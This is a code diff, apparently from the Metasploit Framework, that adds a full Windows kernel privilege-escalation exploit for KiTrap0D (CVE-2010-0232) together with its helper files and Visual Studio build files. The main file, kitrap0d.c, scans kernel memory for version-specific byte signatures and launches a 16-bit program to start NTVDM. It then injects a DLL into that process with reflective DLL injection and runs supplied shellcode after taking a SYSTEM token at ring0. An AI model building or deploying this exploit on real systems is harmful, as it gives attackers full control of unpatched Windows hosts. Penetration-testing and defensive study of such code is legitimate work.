+/*!
+ * @brief Free up memory that was allocated when loading the resource.
+ * @param lpBuffer Pointer to the allocated buffer.
+ * @returns \c ERROR_SUCCESS
+ */
+DWORD resource_destroy(LPBYTE lpBuffer)
+{
+	if (lpBuffer != NULL)
+	{
+		free(lpBuffer);
+	}
+	return ERROR_SUCCESS;
+}
@@ -0,0 +1,11 @@
+/*!
+ * @file ResourceLoader.h
+ * @brief Declarations of helper functions for loading embedded resources.
+ */
+#ifndef _ESCALATE_RESOURCELOADER_H
+#define _ESCALATE_RESOURCELOADER_H
+
+DWORD resource_extract_raw(HMODULE hModule, UINT uResourceId, LPCSTR lpType, LPBYTE* pBuffer, LPDWORD pBufferSize);
+DWORD resource_destroy(LPBYTE lpBuffer);
+
+#endif
@@ -0,0 +1,46 @@
+#ifndef _ESCALATE_COMMON_H
+#define _ESCALATE_COMMON_H
+
+/*! @brief When defined, debug output is enabled on Windows builds. */
+//#define DEBUGTRACE 1
+
+#ifdef DEBUGTRACE
+#include <stdio.h>
+#include <stdarg.h>
+#include <string.h>
+#define dprintf(...) real_dprintf(__VA_ARGS__)
+#else
+#define dprintf(...) do{}while(0);
+#endif
+
+/*! @brief Sets `dwResult` to the return value of `GetLastError()`, prints debug output, then does `break;` */
+#define BREAK_ON_ERROR( str ) { dwResult = GetLastError(); dprintf( "%s. error=%d", str, dwResult ); break; }
+/*! @brief Sets `dwResult` to `error`, prints debug output, then `break;` */
+#define BREAK_WITH_ERROR( str, err ) { dwResult = err; dprintf( "%s. error=%d", str, dwResult ); break; }
+/*! @brief Sets `dwResult` to the return value of `WASGetLastError()`, prints debug output, then does `break;` */
+#define BREAK_ON_WSAERROR( str ) { dwResult = WSAGetLastError(); dprintf( "%s. error=%d", str, dwResult ); break; }
+/*! @brief Sets `dwResult` to the return value of `GetLastError()`, prints debug output, then does `continue;` */
+#define CONTINUE_ON_ERROR( str ) { dwResult = GetLastError(); dprintf( "%s. error=%d", str, dwResult ); continue; }
+
+/*! @brief Close a service handle if not already closed and set the handle to NULL. */
+#define CLOSE_SERVICE_HANDLE( h )  if( h ) { CloseServiceHandle( h ); h = NULL; }
+/*! @brief Close a handle if not already closed and set the handle to NULL. */
+#define CLOSE_HANDLE( h )          if( h ) { DWORD dwHandleFlags; if(GetHandleInformation( h , &dwHandleFlags)) CloseHandle( h ); h = NULL; }
+
+#ifdef DEBUGTRACE
+/*!
+ * @brief Output a debug string to the debug console.
+ * @details The function emits debug strings via `OutputDebugStringA`, hence all messages can be viewed
+ *          using Visual Studio's _Output_ window, _DebugView_ from _SysInternals_, or _Windbg_.
+ */
+static void real_dprintf(char *format, ...) {
+	va_list args;
+	char buffer[1024];
+	va_start(args,format);
+	vsnprintf_s(buffer, sizeof(buffer), sizeof(buffer)-3, format,args);
+	strcat_s(buffer, sizeof(buffer), "\r\n");
+	OutputDebugStringA(buffer);
+}
+#endif
+
+#endif
@@ -0,0 +1,31 @@
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio 2013
+VisualStudioVersion = 12.0.21005.1
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "kitrap0d", "kitrap0d\kitrap0d.vcxproj", "{6B678096-E18A-427A-A8A3-C268AD2E12B8}"
+	ProjectSection(ProjectDependencies) = postProject
+		{DA8EF396-6CC2-404C-AA6A-AD18ACCB2E2D} = {DA8EF396-6CC2-404C-AA6A-AD18ACCB2E2D}
+	EndProjectSection
+EndProject
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "kitrap0d_payload", "kitrap0d_payload\kitrap0d_payload.vcxproj", "{DA8EF396-6CC2-404C-AA6A-AD18ACCB2E2D}"
+EndProject
+Global
+	GlobalSection(SolutionConfigurationPlatforms) = preSolution
+		Debug|Win32 = Debug|Win32
+		Release|Win32 = Release|Win32
+	EndGlobalSection
+	GlobalSection(ProjectConfigurationPlatforms) = postSolution
+		{6B678096-E18A-427A-A8A3-C268AD2E12B8}.Debug|Win32.ActiveCfg = Debug|Win32
+		{6B678096-E18A-427A-A8A3-C268AD2E12B8}.Debug|Win32.Build.0 = Debug|Win32
+		{6B678096-E18A-427A-A8A3-C268AD2E12B8}.Release|Win32.ActiveCfg = Release|Win32
+		{6B678096-E18A-427A-A8A3-C268AD2E12B8}.Release|Win32.Build.0 = Release|Win32
+		{DA8EF396-6CC2-404C-AA6A-AD18ACCB2E2D}.Debug|Win32.ActiveCfg = Debug|Win32
+		{DA8EF396-6CC2-404C-AA6A-AD18ACCB2E2D}.Debug|Win32.Build.0 = Debug|Win32
+		{DA8EF396-6CC2-404C-AA6A-AD18ACCB2E2D}.Release|Win32.ActiveCfg = Release|Win32
+		{DA8EF396-6CC2-404C-AA6A-AD18ACCB2E2D}.Release|Win32.Build.0 = Release|Win32
+	EndGlobalSection
+	GlobalSection(SolutionProperties) = preSolution
+		HideSolutionNode = FALSE
+	EndGlobalSection
+EndGlobal
@@ -0,0 +1,497 @@
+/*!
+ * @file kitrap0d.c
+ * @brief A port of HDM's/Pusscat's implementation of Tavis Ormandy's code (vdmallowed.c).
+ * @remark See http://archives.neohapsis.com/archives/fulldisclosure/2010-01/0346.html
+ * @remark Known Bugs:
+ *          - Windows NT4 fails to map the NULL page, (exit code 'NTAV').
+ *          - Windows 2000 fails to find the VDM_TIB size (something else is wrong)
+ *          - Windows 2008 Storage Server has 16-bit applications disabled by default
+ *          - Windows 2008 Storage Server is also missing twunk_16.exe, has debug.exe
+ */
+#define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
+#define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN
+#include "../../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c"
+
+#include <stdio.h>
+#include "../common/common.h"
+#include "../../../ReflectiveDLLInjection/inject/src/LoadLibraryR.h"
+#include "../common/ResourceLoader.h"
+#include "resource.h"
+
+#define PAGE_SIZE 0x1000
+
+enum { SystemModuleInformation = 11 };
+
+typedef struct
+{
+	ULONG   Unknown1;
+	ULONG   Unknown2;
+	PVOID   Base;
+	ULONG   Size;
+	ULONG   Flags;
+	USHORT  Index;
+	USHORT  NameLength;
+	USHORT  LoadCount;
+	USHORT  PathLength;
+	CHAR    ImageName[256];
+} SYSTEM_MODULE_INFORMATION_ENTRY, * PSYSTEM_MODULE_INFORMATION_ENTRY;
+
+typedef struct
+{
+	ULONG   Count;
+	SYSTEM_MODULE_INFORMATION_ENTRY Module[1];
+} SYSTEM_MODULE_INFORMATION, * PSYSTEM_MODULE_INFORMATION;
+
+typedef struct CodeSignature
+{
+	UCHAR Signature[16];
+	DWORD Version;
+};
+
+/*!
+ * @brief List of code signatures used when searching kernel memory.
+ * @remark These are generated using kd -kl -c 'db nt!Ki386BiosCallReturnAddress;q'
+ */
+struct CodeSignature CodeSignatures[] = {
+	{ "\x64\xA1\x1C\x00\x00\x00\x5A\x89\x50\x04\x8B\x88\x24\x01\x00\x00", 0 }, // Windows NT4
+	{ "\x64\xA1\x1C\x00\x00\x00\x8B\x7D\x58\x8B\x3F\x8B\x70\x04\xB9\x84", 1 }, // Windows 2000
+	{ "\x64\xA1\x1C\x00\x00\x00\x5F\x8B\x70\x04\xB9\x84\x00\x00\x00\x89", 1 }, // Windows 2000 SP4 Advanced Server
+	{ "\x64\xA1\x1C\x00\x00\x00\x8B\x7D\x58\x8B\x3F\x8B\x70\x04\xB9\x84", 2 }, // Windows XP
+	{ "\xA1\x1C\xF0\xDF\xFF\x8B\x7D\x58\x8B\x3F\x8B\x88\x24\x01\x00\x00", 3 }, // Windows 2003
+	{ "\x64\xA1\x1C\x00\x00\x00\x8B\x7D\x58\x8B\x3F\x8B\x88\x24\x01\x00", 3 }, // Windows .NET
+	{ "\x64\xA1\x1C\x00\x00\x00\x8B\x7D\x58\x8B\x3F\x8B\x88\x24\x01\x00", 4 }, // Windows Vista
+	{ "\x64\xA1\x1C\x00\x00\x00\x8B\x7D\x58\x8B\x3F\x8B\x88\x24\x01\x00", 5 }, // Windows 2008
+	{ "\x64\xA1\x1C\x00\x00\x00\x8B\x7D\x58\x8B\x3F\x8B\x88\x24\x01\x00", 6 }, // Windows 7
+	{ "", -1 }
+};
+
+/*!
+ * @brief Scan the appropriate kernel image for the correct offset.
+ * @retval TRUE An offset was found.
+ * @retval FALSE An offset was not found.
+ */
+BOOL kitrap0d_scan_kernel(PDWORD KernelBase, PDWORD OffsetFromBase)
+{
+	DWORD dwResult = ERROR_SUCCESS;
+	FARPROC NtQuerySystemInformation = NULL;
+	HMODULE hKernel = NULL;
+	HMODULE hNtdll = NULL;
+	PIMAGE_DOS_HEADER DosHeader = NULL;
+	PIMAGE_NT_HEADERS PeHeader = NULL;
+	PIMAGE_OPTIONAL_HEADER OptHeader = NULL;
+	PBYTE ImageBase = NULL;
+	HKEY MmHandle = NULL;
+	OSVERSIONINFO os = { 0 };
+	SYSTEM_MODULE_INFORMATION ModuleInfo = { 0 };
+	DWORD PhysicalAddressExtensions = 0;
+	DWORD DataSize = 0;
+	ULONG i = 0;
+	ULONG x = 0;
+
+	// List of versions we have code signatures for.
+	enum {
+		MICROSOFT_WINDOWS_NT4 = 0,
+		MICROSOFT_WINDOWS_2000 = 1,
+		MICROSOFT_WINDOWS_XP = 2,
+		MICROSOFT_WINDOWS_2003 = 3,
+		MICROSOFT_WINDOWS_VISTA = 4,
+		MICROSOFT_WINDOWS_2008 = 5,
+		MICROSOFT_WINDOWS_7 = 6,
+	} Version = MICROSOFT_WINDOWS_7;
+
+	do
+	{
+		hNtdll = GetModuleHandle("ntdll");
+		if (!hNtdll) {
+			BREAK_WITH_ERROR("[KITRAP0D] kitrap0d_scan_kernel. GetModuleHandle ntdll failed", ERROR_INVALID_HANDLE);
+		}
+
+		// NtQuerySystemInformation can be used to find kernel base address
+		NtQuerySystemInformation = GetProcAddress(hNtdll, "NtQuerySystemInformation");
+		if (!NtQuerySystemInformation) {
+			BREAK_WITH_ERROR("[KITRAP0D] kitrap0d_scan_kernel. GetProcAddress NtQuerySystemInformation failed", ERROR_INVALID_HANDLE);
+		}
+
+		// Determine kernel version so that the correct code signature is used
+		os.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
+		if (!GetVersionEx(&os)) {
+			BREAK_ON_ERROR("[KITRAP0D] kitrap0d_scan_kernel. GetVersionEx failed");
+		}
+
+		dprintf("[KITRAP0D] kitrap0d_scan_kernel. GetVersionEx() => %u.%u", os.dwMajorVersion, os.dwMinorVersion);
+
+		if (os.dwMajorVersion == 4 && os.dwMinorVersion == 0) {
+			Version = MICROSOFT_WINDOWS_NT4;
+		}
+		if (os.dwMajorVersion == 5) {
+			if (os.dwMinorVersion == 0) {
+				Version = MICROSOFT_WINDOWS_2000;
+			}
+			if (os.dwMinorVersion == 1) {
+				Version = MICROSOFT_WINDOWS_XP;
+			}
+			if (os.dwMinorVersion == 2) {
+				Version = MICROSOFT_WINDOWS_2003;
+			}
+		}
+		if (os.dwMajorVersion == 6) {
+			if (os.dwMinorVersion == 0) {
+				Version = MICROSOFT_WINDOWS_VISTA;
+			}
+			if (os.dwMinorVersion == 0) {
+				Version = MICROSOFT_WINDOWS_2008;
+			}
+			if (os.dwMinorVersion == 1) {
+				Version = MICROSOFT_WINDOWS_7;
+			}
+		}
+
+		// Learn the loaded kernel (e.g. NTKRNLPA vs NTOSKRNL), and it's base address
+		NtQuerySystemInformation(SystemModuleInformation, &ModuleInfo, sizeof(ModuleInfo), NULL);
+
+		dprintf("[KITRAP0D] kitrap0d_scan_kernel. NtQuerySystemInformation() => %s@%p", ModuleInfo.Module[0].ImageName, ModuleInfo.Module[0].Base);
+
+		// Load the kernel image specified
+		hKernel = LoadLibrary(strrchr(ModuleInfo.Module[0].ImageName, '\\') + 1);
+		if (!hKernel) {
+			BREAK_ON_ERROR("[KITRAP0D] kitrap0d_scan_kernel. LoadLibrary failed");
+		}
+
+		// Parse image headers
+		*KernelBase = (DWORD)ModuleInfo.Module[0].Base;
+		ImageBase = (PBYTE)hKernel;
+		DosHeader = (PIMAGE_DOS_HEADER)ImageBase;
+		PeHeader = (PIMAGE_NT_HEADERS)(ImageBase + DosHeader->e_lfanew);
+		OptHeader = &PeHeader->OptionalHeader;
+
+		dprintf("[KITRAP0D] kitrap0d_scan_kernel. Searching for kernel %u.%u signature: version %d...", os.dwMajorVersion, os.dwMinorVersion, Version);
+
+		for (x = 0;; x++)
+		{
+			if (CodeSignatures[x].Version == -1) {
+				break;
+			}
+
+			if (CodeSignatures[x].Version != Version) {
+				continue;
+			}
+
+			dprintf("[KITRAP0D] kitrap0d_scan_kernel. Trying signature with index %d", x);
+
+			// Scan for the appropriate signature...
+			for (i = OptHeader->BaseOfCode; i < OptHeader->SizeOfCode; i++)
+			{
+				if (memcmp(&ImageBase[i], CodeSignatures[x].Signature, sizeof CodeSignatures[x].Signature) == 0)
+				{
+					dprintf("[KITRAP0D] kitrap0d_scan_kernel. Signature found %#x bytes from kernel base", i);
+
+					*OffsetFromBase = i;
+
+					FreeLibrary(hKernel);
+
+					return TRUE;
+				}
+			}
+		}
+
+	} while (0);
+
+	dprintf("[KITRAP0D] kitrap0d_scan_kernel. Code not found, the signatures need to be updated for this kernel");
+
+	if (hKernel) {
+		FreeLibrary(hKernel);
+	}
+
+	return FALSE;
+}
+
+/*!
+ * @brief Grab a useful Handle to NTVDM.
+ * @param cpProgram Path to the program to invoke.
+ * @param hProcess Pointer to the variable that will receive the process handle.
+ * @retval TRUE Handle acquisition succeeded.
+ * @retval TRUE Handle acquisition failed.
+ */
+BOOL kitrap0d_spawn_ntvdm(char * cpProgram, HANDLE * hProcess)
+{
+	DWORD dwResult = ERROR_SUCCESS;
+	PROCESS_INFORMATION pi = { 0 };
+	STARTUPINFO si = { 0 };
+	ULONG i = 0;
+
+	do
+	{
+		si.cb = sizeof(STARTUPINFO);
+
+		// Start the child process, which should invoke NTVDM...
+		if (!CreateProcess(cpProgram, cpProgram, NULL, NULL, 0, CREATE_SUSPENDED, NULL, NULL, &si, &pi)) {
+			BREAK_ON_ERROR("[KITRAP0D] kitrap0d_spawn_ntvdm. CreateProcess failed");
+		}
+
+		dprintf("[KITRAP0D] kitrap0d_spawn_ntvdm. CreateProcess(\"%s\") => %u", cpProgram, pi.dwProcessId);
+
+		// Get more access
+		*hProcess = OpenProcess(PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ | PROCESS_TERMINATE, FALSE, pi.dwProcessId);
+		if (*hProcess == NULL)
+		{
+			TerminateProcess(pi.hProcess, 'SPWN');
+			CloseHandle(pi.hThread);
+			CloseHandle(pi.hProcess);
+			BREAK_ON_ERROR("[KITRAP0D] kitrap0d_spawn_ntvdm. OpenProcess failed");
+		}
+
+		dprintf("[KITRAP0D] kitrap0d_spawn_ntvdm. OpenProcess(%u) => %#x", pi.dwProcessId, *hProcess);
+
+		CloseHandle(pi.hThread);
+
+		CloseHandle(pi.hProcess);
+
+	} while (0);
+
+	if (dwResult == ERROR_SUCCESS) {
+		return TRUE;
+	}
+
+	return FALSE;
+}
+
+/*!
+ * @brief Find a suitable exe to host the exploit in.
+ * @param cpOutput Buffer that will contain the path to the executable which will
+ *                 host the exploit.
+ * @param dwOutputSize Size of the \c cpOutput buffer.
+ * @retval TRUE Found a valid exe to host the exploit in.
+ * @retval FALSE Unable to find a valid exe to host the exploit in.
+ */
+BOOL elevate_via_exploit_getpath( char *cpOutput, DWORD dwOutputSize )
+{
+	DWORD dwResult         = ERROR_SUCCESS;
+	char cWinDir[MAX_PATH] = {0};
+	DWORD dwIndex          = 0;
+	char * cpFiles[]       = {  "twunk_16.exe", 
+								"debug.exe", 
+								"system32\\debug.exe", 
+								NULL };
+
+	do
+	{
+		if( !GetWindowsDirectory( cWinDir, MAX_PATH ) )
+			BREAK_ON_ERROR( "[KITRAP0D] elevate_via_exploit_getpath. GetWindowsDirectory failed" );
+	
+		while( TRUE )
+		{
+			char * cpFileName = cpFiles[dwIndex];
+			if( !cpFileName )
+				break;
+
+			if ( _snprintf_s( cpOutput, dwOutputSize, dwOutputSize - 1, "%s%s%s", cWinDir,
+				 cWinDir[ strlen(cWinDir) - 1 ] == '\\' ? "" : "\\", cpFileName ) == -1 )
+			{
+				dprintf( "[KITRAP0D] elevate_via_exploit_getpath. Path truncation: %s", cpOutput );
+				break;
+			}
+
+			dprintf( "[KITRAP0D] elevate_via_exploit_getpath. Trying: %s", cpOutput );
+
+			if( GetFileAttributes( cpOutput ) != INVALID_FILE_ATTRIBUTES )
+				return TRUE;
+
+			memset( cpOutput, 0, dwOutputSize );
+
+			dwIndex++;
+		}
+
+	} while(0);
+
+	return FALSE;
+}
+
+/*!
+ * @brief Helper thread function which runs the given payload directly.
+ * @param lpPayload The payload shellcode to execute.
+ * @returns \c ERROR_SUCCESS
+ */
+DWORD WINAPI execute_payload(LPVOID lpPayload)
+{
+	dprintf("[KITRAP0D] Payload thread started.");
+	VOID(*lpCode)() = (VOID(*)())lpPayload;
+	lpCode();
+	return ERROR_SUCCESS;
+}
+
+/*!
+ * @breif Entry point for the KiTrap0D exploit.
+ * @remark This is known as CVE-2010-0232.
+ * @param hElevateModule Handle to the DLL which contains the kitrap0d_payload DLL.
+ * @param lpPayload Pointer to the shellcode to run on successful exploitation.
+ * @returns Indication of success or failure.
+ * @retval ERROR_SUCCESS The exploit worked as expected.
+ * @retval ERROR_NOT_SUPPORTED The exploit is not supported on this platform.
+ */
+DWORD elevate_via_exploit_kitrap0d(HMODULE hElevateModule, LPVOID lpPayload)
+{
+	DWORD dwResult = ERROR_SUCCESS;
+	HANDLE hVdm = NULL;
+	HANDLE hThread = NULL;
+	LPVOID lpServiceBuffer = NULL;
+	LPVOID lpRemoteCommandLine = NULL;
+	char cWinDir[MAX_PATH] = { 0 };
+	char cVdmPath[MAX_PATH] = { 0 };
+	char cCommandLine[MAX_PATH] = { 0 };
+	DWORD dwExitCode = 0;
+	DWORD dwKernelBase = 0;
+	DWORD dwOffset = 0;
+	DWORD dwServiceLength = 0;
+
+	do
+	{
+		dprintf("[KITRAP0D] elevate_via_exploit_kitrap0d. Starting with HMODULE %x ...", hElevateModule);
+
+		if (lpPayload == NULL) {
+			BREAK_WITH_ERROR("[KITRAP0D] payload argument not specified", ERROR_BAD_ARGUMENTS);
+		}
+
+		if (resource_extract_raw(hElevateModule, IDR_DLL_KITRAP0D, "DLL", (LPBYTE*)&lpServiceBuffer, &dwServiceLength) != ERROR_SUCCESS) {
+			BREAK_WITH_ERROR("[KITRAP0D] elevate_via_exploit_kitrap0d. Failed to find/load kitrap0d.dll", ERROR_BAD_ARGUMENTS);
+		}
+
+		if (!dwServiceLength || !lpServiceBuffer) {
+			BREAK_WITH_ERROR("[KITRAP0D] elevate_via_exploit_kitrap0d. Failed to find/load kitrap0d.dll", ERROR_BAD_ARGUMENTS);
+		}
+
+		// 1. first get a file path to a suitable exe...
+		if (!elevate_via_exploit_getpath(cVdmPath, MAX_PATH)) {
+			BREAK_WITH_ERROR("[KITRAP0D] elevate_via_exploit_kitrap0d. elevate_via_exploit_getpath failed", ERROR_FILE_NOT_FOUND);
+		}
+
+		// 2. Scan kernel image for the required code sequence, and find the base address...
+		if (!kitrap0d_scan_kernel(&dwKernelBase, &dwOffset)) {
+			BREAK_WITH_ERROR("[KITRAP0D] elevate_via_exploit_kitrap0d. kitrap0d_scanforcodesignature failed", ERROR_INVALID_HANDLE);
+		}
+
+		// 3. Invoke the NTVDM subsystem, by launching any MS-DOS executable...
+		dprintf("[KITRAP0D] elevate_via_exploit_kitrap0d. Starting the NTVDM subsystem by launching MS-DOS executable");
+
+		if (!kitrap0d_spawn_ntvdm(cVdmPath, &hVdm)) {
+			BREAK_WITH_ERROR("[KITRAP0D] elevate_via_exploit_kitrap0d. kitrap0d_spawn_ntvdm failed", ERROR_INVALID_HANDLE);
+		}
+
+		// 4. Use RDI to inject the elevator dll into the remote NTVDM process...
+		//    Passing in the parameters required by exploit thread via the LoadRemoteLibraryR inject technique.
+		_snprintf_s(cCommandLine, sizeof(cCommandLine), sizeof(cCommandLine), "/VDM_TARGET_PID:0x%08X /VDM_TARGET_KRN:0x%08X /VDM_TARGET_OFF:0x%08X\x00", GetCurrentProcessId(), dwKernelBase, dwOffset);
+
+		// alloc some space and write the commandline which we will pass to the injected dll...
+		lpRemoteCommandLine = VirtualAllocEx(hVdm, NULL, strlen(cCommandLine) + 1, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
+
+		if (!lpRemoteCommandLine) {
+			BREAK_ON_ERROR("[KITRAP0D] elevate_via_exploit_kitrap0d. VirtualAllocEx failed");
+		}
+
+		if (!WriteProcessMemory(hVdm, lpRemoteCommandLine, cCommandLine, strlen(cCommandLine) + 1, NULL)) {
+			BREAK_ON_ERROR("[KITRAP0D] elevate_via_exploit_kitrap0d. WriteProcessMemory failed");
+		}
+
+		// inject the dll...
+		hThread = LoadRemoteLibraryR(hVdm, lpServiceBuffer, dwServiceLength, lpRemoteCommandLine);
+		if (!hThread) {
+			BREAK_ON_ERROR("[KITRAP0D] elevate_via_exploit_kitrap0d. LoadRemoteLibraryR failed");
+		}
+
+		// 5. Wait for the thread to complete
+		dprintf("[KITRAP0D] elevate_via_exploit_kitrap0d. WaitForSingleObject(%#x, INFINITE);", hThread);
+		WaitForSingleObject(hThread, INFINITE);
+
+		// pass some information back via the exit code to indicate what happened.
+		GetExitCodeThread(hThread, &dwExitCode);
+
+		dprintf("[KITRAP0D] elevate_via_exploit_kitrap0d. GetExitCodeThread(%#x, %p); => %#x", hThread, &dwExitCode, dwExitCode);
+
+		switch (dwExitCode)
+		{
+		case 'VTIB':
+			// A data structure supplied to the kernel called VDM_TIB has to have a 'size' field that
+			// matches what the kernel expects.
+			// Try running `kd -kl -c 'uf nt!VdmpGetVdmTib;q'` and looking for the size comparison.
+			BREAK_WITH_ERROR("[KITRAP0D] elevate_via_exploit_kitrap0d. The exploit thread was unable to find the size of the VDM_TIB structure", dwExitCode);
+		case 'NTAV':
+			// NtAllocateVirtualMemory() can usually be used to map the NULL page, which NtVdmControl()
+			// expects to be present.
+			// The exploit thread reports it didn't work.
+			BREAK_WITH_ERROR("[KITRAP0D] elevate_via_exploit_kitrap0d. The exploit thread was unable to map the virtual 8086 address space", dwExitCode);
+		case 'VDMC':
+			// NtVdmControl() must be initialised before you can begin vm86 execution, but it failed.
+			// It's entirely undocumented, so you'll have to use kd to step through it and find out why
+			// it's failing.
+			BREAK_WITH_ERROR("[KITRAP0D] elevate_via_exploit_kitrap0d. The exploit thread reports NtVdmControl() failed", dwExitCode);
+		case 'LPID':
+			// This exploit will try to transplant the token from PsInitialSystemProcess on to an
+			// unprivileged process owned by you.
+			// PsLookupProcessByProcessId() failed when trying to find your process.
+			BREAK_WITH_ERROR("[KITRAP0D] elevate_via_exploit_kitrap0d. The exploit thread reports that PsLookupProcessByProcessId() failed", dwExitCode);
+		case FALSE:
+			// This probably means LoadLibrary() failed, perhaps the exploit dll could not be found?
+			// Verify the vdmexploit.dll file exists, is readable and is in a suitable location.
+			BREAK_WITH_ERROR("[KITRAP0D] elevate_via_exploit_kitrap0d. The exploit thread was unable to load the injected dll", dwExitCode);
+		case 'w00t':
+			// This means the exploit payload was executed at ring0 and succeeded.
+			BREAK_WITH_ERROR("[KITRAP0D] elevate_via_exploit_kitrap0d. The exploit thread reports exploitation was successful", ERROR_SUCCESS);
+		default:
+			// Unknown error. Sorry, you're on your own.
+			BREAK_WITH_ERROR("[KITRAP0D] elevate_via_exploit_kitrap0d. The exploit thread returned an unexpected error. ", dwExitCode);
+		}
+
+	} while (0);
+
+	if (hVdm)
+	{
+		TerminateProcess(hVdm, 0);
+		CloseHandle(hVdm);
+	}
+
+	if (hThread)
+	{
+		CloseHandle(hThread);
+	}
+
+	// if we succeeded, we need to run our payload in another thread.
+	if (dwResult == ERROR_SUCCESS) {
+		CreateThread(0, 0, execute_payload, lpPayload, 0, NULL);
+	}
+
+	return dwResult;
+}
+
+/*!
+ * @brief Entry point to the exploit DLL.
+ * @param hinstDLL Reference to the DLL's module.
+ * @param dwReason The reason code for the invocation.
+ * @param lpReserved A reserved value, used by the exploit code.
+ *                     - \c RUN_EXPLOIT_KITRAP0D - Execute the KiTrap0d exploit.
+ * @returns \c TRUE all the time.
+ * @remark The \c lpReserved value contains a number which identifies which
+ *         exploit to invoke. This needs to be passed in from MSF, otherwise
+ *         no exploit funtionality will be invoked.
+ */
+BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved)
+{
+	DWORD dwExploit = 0;
+	BOOL bReturnValue = TRUE;
+
+	switch (dwReason)
+	{
+	case DLL_PROCESS_ATTACH:
+		hAppInstance = hinstDLL;
+		elevate_via_exploit_kitrap0d(hinstDLL, lpReserved);
+		break;
+	case DLL_QUERY_HMODULE:
+		if (lpReserved != NULL) {
+			*(HMODULE *)lpReserved = hAppInstance;
+		}
+		break;
+	case DLL_PROCESS_DETACH:
+	case DLL_THREAD_ATTACH:
+	case DLL_THREAD_DETACH:
+		break;
+	}
+	return bReturnValue;
+}
@@ -0,0 +1,149 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <ItemGroup Label="ProjectConfigurations">
+    <ProjectConfiguration Include="Debug|Win32">
+      <Configuration>Debug</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|Win32">
+      <Configuration>Release</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+  </ItemGroup>
+  <PropertyGroup Label="Globals">
+    <ProjectGuid>{6B678096-E18A-427A-A8A3-C268AD2E12B8}</ProjectGuid>
+    <RootNamespace>kitrap0d</RootNamespace>
+    <Keyword>Win32Proj</Keyword>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
+    <ConfigurationType>DynamicLibrary</ConfigurationType>
+    <CharacterSet>MultiByte</CharacterSet>
+    <WholeProgramOptimization>false</WholeProgramOptimization>
+    <PlatformToolset>v120_xp</PlatformToolset>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
+    <ConfigurationType>DynamicLibrary</ConfigurationType>
+    <CharacterSet>MultiByte</CharacterSet>
+    <PlatformToolset>v120_xp</PlatformToolset>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
+  <ImportGroup Label="ExtensionSettings">
+    <Import Project="$(VCTargetsPath)\BuildCustomizations\masm.props" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <PropertyGroup Label="UserMacros" />
+  <PropertyGroup>
+    <_ProjectFileVersion>10.0.30319.1</_ProjectFileVersion>
+    <OutDir>$(Configuration)\$(Platform)\</OutDir>
+    <IntDir>$(Configuration)\$(Platform)\</IntDir>
+    <LinkIncremental>false</LinkIncremental>
+    <GenerateManifest>false</GenerateManifest>
+    <CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
+    <CodeAnalysisRules />
+    <CodeAnalysisRuleAssemblies />
+    <TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
+  </PropertyGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <ClCompile>
+      <Optimization>Disabled</Optimization>
+      <AdditionalIncludeDirectories>..\..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
+      <PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;KITRAP0D_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <MinimalRebuild>true</MinimalRebuild>
+      <BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
+      <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
+      <PrecompiledHeader>
+      </PrecompiledHeader>
+      <WarningLevel>Level3</WarningLevel>
+    </ClCompile>
+    <Link>
+      <AdditionalDependencies>Mpr.lib;%(AdditionalDependencies)</AdditionalDependencies>
+      <AdditionalLibraryDirectories>%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
+      <DelayLoadDLLs>%(DelayLoadDLLs)</DelayLoadDLLs>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+      <SubSystem>Windows</SubSystem>
+      <TargetMachine>MachineX86</TargetMachine>
+      <ModuleDefinitionFile>
+      </ModuleDefinitionFile>
+      <AdditionalOptions>/ignore:4070</AdditionalOptions>
+    </Link>
+    <PostBuildEvent>
+      <Command>editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL</Command>
+    </PostBuildEvent>
+    <ResourceCompile>
+      <PreprocessorDefinitions>_DEBUG;_USING_V110_SDK71_;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+    </ResourceCompile>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <ClCompile>
+      <Optimization>MinSpace</Optimization>
+      <InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
